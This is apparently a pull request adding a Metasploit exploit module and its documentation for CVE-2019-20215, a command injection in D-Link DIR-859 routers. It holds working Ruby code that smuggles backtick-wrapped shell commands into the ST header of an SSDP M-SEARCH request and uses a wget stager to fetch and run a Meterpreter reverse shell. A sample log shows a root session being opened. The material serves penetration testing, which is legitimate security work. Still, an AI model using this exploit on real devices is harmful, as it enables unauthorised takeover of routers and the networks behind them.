### PR TITLE
Cve 2019 20215

### DIFF
--- a/documentation/modules/exploit/upnp/dlink_dir859_exec_ssdpcgi.md
+++ b/documentation/modules/exploit/upnp/dlink_dir859_exec_ssdpcgi.md
@@ -1,0 +1,35 @@
+## Introduction
+
+This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands. The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID or URN headers of a M-SEARCH UPnP request.
+
+## Vulnerable Application
+
+Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.
+
+## Verification Steps
+
+1. Set up router/emulated device
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/dlink_dir859_exec_ssdpcgi`
+4. Do: `set RHOSTS <router_ip>`
+5. Do: `set LHOST <local_ip>`
+6. Do: `set TARGET <URN/UUID>`
+7. Do: `run`
+8. You should get a session as `root`.
+
+## Scenarios
+
+### D-link DIR-859 Firmware 1.05
+```
+msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run 
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Using URL: http://0.0.0.0:8080/38YWEX2
+[*] Local IP: http://192.168.70.28:8080/38YWEX2
+[*] Target Payload URN
+[*] Client 192.168.0.1 (Wget) requested /38YWEX2
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Command Stager progress - 100.00% done (110/110 bytes)
+[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
+[*] Server stopped.
+meterpreter > 
+```

--- a/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
+++ b/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'  =>
         [
           ['CVE', '2019-20215'],
-          ['URL', 'https://medium.com/@s1kr10s/']
+          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
         ],
       'DisclosureDate' => 'Dec 24 2019',
       'Privileged'     => true,
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'Auto',	{ } ],
         ],
-      'CmdStagerFlavor' => %w{ echo printf wget },
+      'CmdStagerFlavor' => %w{ echo wget },
       'DefaultTarget'  => 0
       ))
 
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
       Msf::OptEnum.new('VECTOR',[true, 'Header thrugh which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
     ])
   end
-  
+
   def exploit
     execute_cmdstager(linemax: 1500)
   end

--- a/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
+++ b/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
@@ -1,0 +1,95 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
+      'Description' => %q{
+        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
+      },
+      'Author'      =>
+        [
+          's1kr10s',
+          'secenv'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2019-20215'],
+          ['URL', 'https://medium.com/@s1kr10s/']
+        ],
+      'DisclosureDate' => 'Dec 24 2019',
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'        => ARCH_MIPSBE,
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' =>
+        {
+            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'wget'
+        },
+      'Targets'        =>
+        [
+          [ 'urn',
+            {
+            'Arch' => ARCH_MIPSBE,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'uuid',
+            {
+            'Arch' => ARCH_MIPSBE,
+            'Platform' => 'linux'
+            }
+          ]
+        ],
+      'CmdStagerFlavor' => %w{ echo printf wget },
+      'DefaultTarget'  => 0
+      ))
+
+  register_options(
+    [
+      Opt::RHOST(),
+      Opt::RPORT(1900)
+    ])
+  end
+
+  def exploit
+    execute_cmdstager(linemax: 1500)
+  end
+
+  def execute_command(cmd, opts)
+    if target.name =~ /urn/
+      print_status("Target Payload URN")
+      val = "urn:device:1;`#{cmd}`"
+    elsif target.name =~ /uuid/
+      print_status("Target Payload UUID")
+      val = "uuid:`#{cmd}`"
+    end
+
+    connect_udp
+    header =
+      "M-SEARCH * HTTP/1.1\r\n" +
+      "Host:239.255.255.250:1900\r\n" +
+      "ST:#{val}\r\n" +
+      "Man:\"ssdp:discover\"\r\n" +
+      "MX:2\r\n\r\n"
+    udp_sock.put(header)
+    disconnect_udp
+  end
+end

--- a/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
+++ b/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::Udp
   include Msf::Exploit::CmdStager
 
@@ -31,32 +30,15 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => true,
       'Platform'       => 'linux',
       'Arch'        => ARCH_MIPSBE,
-      'Payload'     =>
-        {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find',
-          },
-        },
       'DefaultOptions' =>
         {
             'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
-            'CMDSTAGER::FLAVOR' => 'wget'
+            'CMDSTAGER::FLAVOR' => 'wget',
+            'RPORT' => '1900'
         },
       'Targets'        =>
         [
-          [ 'urn',
-            {
-            'Arch' => ARCH_MIPSBE,
-            'Platform' => 'linux'
-            }
-          ],
-          [ 'uuid',
-            {
-            'Arch' => ARCH_MIPSBE,
-            'Platform' => 'linux'
-            }
-          ]
+          [ 'Auto',	{ } ],
         ],
       'CmdStagerFlavor' => %w{ echo printf wget },
       'DefaultTarget'  => 0
@@ -64,31 +46,30 @@ class MetasploitModule < Msf::Exploit::Remote
 
   register_options(
     [
-      Opt::RHOST(),
-      Opt::RPORT(1900)
+      Msf::OptEnum.new('VECTOR',[true, 'Header thrugh which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
     ])
   end
-
+  
   def exploit
     execute_cmdstager(linemax: 1500)
   end
 
   def execute_command(cmd, opts)
-    if target.name =~ /urn/
+    type = datastore['VECTOR']
+    if type == "URN"
       print_status("Target Payload URN")
       val = "urn:device:1;`#{cmd}`"
-    elsif target.name =~ /uuid/
+    else
       print_status("Target Payload UUID")
       val = "uuid:`#{cmd}`"
     end
 
     connect_udp
-    header =
-      "M-SEARCH * HTTP/1.1\r\n" +
-      "Host:239.255.255.250:1900\r\n" +
-      "ST:#{val}\r\n" +
-      "Man:\"ssdp:discover\"\r\n" +
-      "MX:2\r\n\r\n"
+    header = "M-SEARCH * HTTP/1.1\r\n"
+    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
+    header << "ST:#{val}\r\n"
+    header << "Man:\"ssdp:discover\"\r\n"
+    header << "MX:2\r\n\r\n"
     udp_sock.put(header)
     disconnect_udp
   end

--- a/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
+++ b/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   register_options(
     [
-      Msf::OptEnum.new('VECTOR',[true, 'Header thrugh which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
+      Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
     ])
   end
 


### PR DESCRIPTION
## Introduction

This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands. The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID or URN headers of a M-SEARCH UPnP request.

## Vulnerable Application

Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.

## Verification Steps

1. Set up router/emulated device
2. Start `msfconsole`
3. Do: `use exploit/linux/upnp/dlink_dir859_exec_ssdpcgi`
4. Do: `set RHOSTS <router_ip>`
5. Do: `set LHOST <local_ip>`
6. Do: `set TARGET <URN/UUID>`
7. Do: `run`
8. You should get a session as `root`.

## Scenarios

### D-link DIR-859 Firmware 1.05
```
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > run 
[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://0.0.0.0:8080/38YWEX2
[*] Local IP: http://192.168.70.28:8080/38YWEX2
[*] Target Payload URN
[*] Client 192.168.0.1 (Wget) requested /38YWEX2
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
[*] Server stopped.
meterpreter > 
```

(Was PR #12769 @space-r7 @bcoles )